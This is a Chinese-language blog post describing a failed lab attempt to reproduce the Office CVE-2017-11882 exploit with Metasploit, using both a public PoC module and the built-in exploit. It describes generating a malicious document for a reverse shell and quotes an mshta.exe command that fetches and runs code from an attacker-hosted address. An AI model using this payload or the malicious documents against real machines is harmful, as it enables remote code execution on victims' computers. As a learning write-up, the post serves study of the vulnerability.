Office CVE-2017-11882复现
繼續練習metasploit的使用,這次復現的是11882這個漏洞,但是最后并沒有成功(已經把我逼瘋)。這里記錄兩個復現方式,希望有緣人能夠為小女子解答最后不成功的原因,小女子感激不盡。
就不去介紹這個漏洞了,網上搜一大把的。下面直接放兩個方式的截圖以及簡單講解。
00X0利用網上的poc來復現
poc地址:https://www.cnblogs.com/i-honey/p/7885573.html
首先要把cve-2017-11882.rb文件復制到msf模塊下
然后打開README.md,按照提示進行惡意doc的生成,其中有一個是用來彈計算器的。我們直接生成惡意doc,注意這里的地址要換成你自己主機的地址。
然后我們來使用我們添加的msf模塊,設置參數,這里如果search不到新添加的模塊可以使用:reload_all命令
然后運行,這里也顯示失敗的結果了。如果成功反彈shell輸入sessions的時候會出現一個或者多個session。
失敗的原因我想和下面這個錯誤有關。當我在本地cmd下運行【mshta.exe "http://192.168.40.22:8080/abc " 的時候也是出現系統找不到指定文件的錯誤。
00X01利用Metasploit自帶exp
search模塊,然后set參數,如圖,當我在主機打開惡意doc時,直接出來下圖內容,之前在網上看到一哥們說這是表示本機office沒有漏洞,但是我利用彈計算器的測試doc能夠成功彈出doc,說明本地office版本應該還是有漏洞的吧。
朋友說是我主機windows系統的原因,他在他本地也不能反彈,但是他在他windows虛擬機里面就可以。我也是母雞了~
轉載于:https://blog.51cto.com/13539934/2103188
總結
以上是生活随笔為你收集整理的Office CVE-2017-11882复现的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: jsp 或 php 等view之中使用j
- 下一篇: GCP发布Kaniko:在非特权容器和K